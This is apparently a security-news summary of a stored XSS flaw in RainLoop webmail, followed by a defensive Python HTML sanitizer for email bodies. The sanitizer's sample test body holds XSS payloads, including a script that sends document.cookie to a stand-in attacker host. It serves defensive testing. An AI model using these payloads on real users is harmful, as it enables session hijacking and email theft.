According to application security firm Sonar, an unpatched vulnerability in the RainLoop webmail client can be exploited to hijack a user’s session and steal their emails.
RainLoop is an open-source, web-based email client used by many organizations; using the Shodan search engine, Sonar says it found hundreds of internet-exposed instances. According to Sonar's researchers, RainLoop 1.16.0 is affected by a stored cross-site scripting (XSS) vulnerability that is exploitable against the default configuration.
To exploit the bug, an attacker only needs to send a specially crafted email to a RainLoop user. When the victim opens the message, the JavaScript payload hidden in it runs in the victim's browser with no further user interaction; because the payload arrives and persists through normal mail delivery, the victim does not have to follow a link or take any other action beyond reading the mail.
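The attack described above is stored XSS through HTML mail: active content sits in a message body that the webmail client later renders in the user's authenticated browser session. The standard defence is an allowlist sanitizer applied to every message body before it is rendered. The following is an added example written for this page; it is not RainLoop's own sanitizer and not the payload Sonar reported (the article does not disclose it). The tag and attribute allowlists, the URL scheme check, the `sanitize_email_html` and `safe_url` names and the sample message body are all assumptions constructed for illustration.

```python
"""Allowlist sanitizer for untrusted HTML e-mail bodies (added example, not
RainLoop code). Built on the standard-library HTMLParser so that tags and
attributes are tokenised by a real parser rather than by regexes."""
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Allowlists are assumptions for this example; a real client would tune them.
ALLOWED_TAGS = {
    "p", "br", "div", "span", "b", "strong", "i", "em", "u", "blockquote",
    "ul", "ol", "li", "a", "img", "table", "tr", "td", "th",
}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}}   # no style, no on*
ALLOWED_SCHEMES = {"http", "https", "mailto", "cid"}
VOID_TAGS = {"br", "img"}
# Elements whose text content is discarded together with the element itself.
DROP_CONTENT_TAGS = {"script", "style", "iframe", "object", "embed",
                     "svg", "math", "template"}


def safe_url(value):
    """Return a normalised URL if its scheme is allowlisted, else None."""
    # Browsers strip leading/trailing C0 controls and remove tab/CR/LF anywhere
    # before parsing the scheme; mirror that so "java\tscript:" cannot pass as
    # a scheme-less relative URL.
    cleaned = value.strip("".join(chr(c) for c in range(0x21)))
    cleaned = "".join(ch for ch in cleaned if ch not in "\t\r\n")
    if any(ord(ch) < 0x20 for ch in cleaned):
        return None
    try:
        scheme = urlsplit(cleaned).scheme.lower()
    except ValueError:
        return None
    # Relative URLs would resolve against the webmail origin: reject them too.
    return cleaned if scheme in ALLOWED_SCHEMES else None


class EmailSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.open_tags = []    # allowed elements currently open, kept balanced
        self.skip_stack = []   # dropped elements whose content is being skipped

    def handle_starttag(self, tag, attrs):
        if self.skip_stack:
            if tag in DROP_CONTENT_TAGS and tag not in VOID_TAGS:
                self.skip_stack.append(tag)
            return
        if tag in DROP_CONTENT_TAGS:
            self.skip_stack.append(tag)
            return
        if tag not in ALLOWED_TAGS:
            return  # unknown element dropped; its text still comes through as text
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # this is what removes onerror=, onload=, style= ...
            if name in ("href", "src"):
                value = safe_url(value or "")
                if value is None:
                    continue
            kept.append(' %s="%s"' % (name, html.escape(value or "", quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if self.skip_stack:
            if tag == self.skip_stack[-1]:
                self.skip_stack.pop()
            return
        if tag in self.open_tags:
            # Close everything opened after it as well, so output stays balanced.
            while True:
                last = self.open_tags.pop()
                self.out.append("</%s>" % last)
                if last == tag:
                    break

    def handle_data(self, data):
        if not self.skip_stack:
            self.out.append(html.escape(data, quote=False))

    def handle_comment(self, data):
        pass  # comments (including conditional comments) are dropped

    def handle_decl(self, decl):
        pass

    def handle_pi(self, data):
        pass

    def unknown_decl(self, data):
        pass

    def result(self):
        self.close()
        while self.open_tags:
            self.out.append("</%s>" % self.open_tags.pop())
        return "".join(self.out)


def sanitize_email_html(body):
    parser = EmailSanitizer()
    parser.feed(body)
    return parser.result()


# Constructed sample message body exercising common bypass attempts; it is not
# the payload from the advisory.
SAMPLE_BODY = """<p>Hi, please see the <a href="https://example.com/report">report</a>.</p>
<script>fetch('https://attacker.invalid/?c=' + document.cookie)</script>
<img src="x" onerror="alert(document.cookie)">
<a href="JavaScript:alert(1)">click</a>
<a href="java&#9;script:alert(1)">click2</a>
<style>body{background:url(javascript:alert(1))}</style>
<div style="background:url(javascript:alert(1))">styled</div>
<iframe src="https://attacker.invalid"></iframe>
<b>unclosed bold
"""

if __name__ == "__main__":
    print(sanitize_email_html(SAMPLE_BODY))
```

The sanitizer is one layer only. The second layer a webmail client should have is rendering the message in a sandboxed iframe or on a separate origin with a Content-Security-Policy that forbids inline script, so that a sanitizer miss does not hand the attacker the session cookie as in the attack Sonar describes.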
Read More: https://www.securityweek.com/unpatched-vulnerability-allows-hackers-steal-emails-rainloop-users